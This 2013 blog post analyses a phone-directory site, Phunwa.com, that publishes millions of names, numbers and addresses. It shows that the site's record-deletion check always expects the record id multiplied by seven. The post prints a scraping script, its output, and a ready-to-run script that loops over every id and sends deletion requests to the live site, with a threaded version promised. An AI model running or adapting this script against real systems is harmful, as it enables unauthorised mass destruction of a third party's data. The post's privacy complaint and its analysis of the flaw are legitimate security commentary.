Friday 22 March 2013

Analysis of a Bad web-app

Alright, I can't really call this an app; it's more like a search engine ... that allows you to delete its records.

 
This website pissed me off because it makes ~11.5 million telephone records and related information (name, address) publicly searchable and indexable. I guess Google has already indexed all of the pages, so even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches. It supposedly takes its data from BSNL's searchable but non-indexable directory. I could go on about how this is a privacy issue, but I'll leave that for another post.

 

There's a tiny delete button at the bottom that takes you to a confirmation page, which asks you to add two numbers before the record is removed.

 
There's an id parameter (passed in the request body) associated with each telephone record, which I suppose is the database id of the record. The numbers in the equation are plain text in the DOM and can be scraped to automate deletion of a record. I wrote a Python script to parse the HTML using a regex and retrieve those numbers:

    import re
    import urllib
    import urllib2

    # Matches the "a + b" challenge shown on the removal page.
    equation = re.compile(r'([0-9]+) \+ ([0-9]+)')
    p_url = 'http://www.phunwa.com/removeentry/'

    for counter in range(800000, 800005):
        params = {
            'id': counter,
            'Remove this entry': 'Remove this number from the site'
        }
        req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
        source = urllib2.urlopen(req).read()
        for a, b in equation.findall(source):
            print "id: %s | %s + %s = %s" % (counter, a, b, int(a) + int(b))



Which gives the following output:

    id: 800000 | 119805 + 5480195 = 5600000
    id: 800001 | 787730 + 4812277 = 5600007
    id: 800002 | 534978 + 5065036 = 5600014
    id: 800003 | 155396 + 5444625 = 5600021
    id: 800004 | 88748 + 5511280 = 5600028



For each increment of the id, the answer increments by 7 (even though the two numbers themselves are generated differently each time), which can only mean one thing:

Whoever designed this thing never heard of reCAPTCHA. It doesn't even verify that the referrer (the URL containing the phone number associated with the id) is correct, but that's too much to ask for, considering the confirmation method they chose to implement is answer = id*7.
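
The rule is easy to check against the five rows printed above. A minimal sketch, with the sums copied from that output; the names `observed` and `expected_answer` are mine and not anything taken from the site:

```python
# Sums scraped from the confirmation page, copied from the output above.
observed = {
    800000: 119805 + 5480195,
    800001: 787730 + 4812277,
    800002: 534978 + 5065036,
    800003: 155396 + 5444625,
    800004: 88748 + 5511280,
}

def expected_answer(record_id):
    """The guessed confirmation rule: answer = id * 7."""
    return record_id * 7

# True only if every observed sum matches the guessed rule.
all_match = all(total == expected_answer(rid) for rid, total in observed.items())
print(all_match)
```

All five rows match, so it prints `True`. Five samples don't prove the rule holds for every id, but they make it a very safe bet.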

The total number of records could be around 11,547,208; that's the highest the id goes before the site returns a 500. In theory, it is thus possible to delete every record on Phunwa.com without any user intervention, beyond renting an EC2 instance and running this script:

    import urllib
    import urllib2

    def annihilate_phunwa():
        p_url = 'http://www.phunwa.com/confirmdelete/'

        # xrange avoids building an 11.5-million-element list in memory.
        for counter in xrange(1, 11547209):
            params = {
                'id': counter,
                'answer': counter * 7,  # the "captcha" answer is always id * 7
                'Confirm Delete': 'Submit Query'
            }
            try:
                req = urllib2.Request(url=p_url, data=urllib.urlencode(params))
                urllib2.urlopen(req)
            except urllib2.HTTPError as e:
                # e.code holds the HTTP status as an int.
                if e.code == 500:
                    print 'id=%s may already be deleted!' % counter
                else:
                    print 'Something else has gone wrong!'

    annihilate_phunwa()
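
For a single record, the form body that the script sends can be built and inspected offline. This is only a sketch, assuming the same field names as the script above; the helper `build_confirm_body` is hypothetical and nothing here touches the network:

```python
try:
    from urllib import urlencode          # Python 2
except ImportError:
    from urllib.parse import urlencode    # Python 3

def build_confirm_body(record_id):
    """Return the urlencoded form body for one record (hypothetical helper)."""
    params = [
        ('id', record_id),
        ('answer', record_id * 7),        # the guessed rule: answer = id * 7
        ('Confirm Delete', 'Submit Query'),
    ]
    return urlencode(params)

print(build_confirm_body(800000))
```

For id 800000 this prints `id=800000&answer=5600000&Confirm+Delete=Submit+Query`. I used a list of pairs rather than a dict so the field order is the same on every Python version.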



I may update this code with one that implements threading.
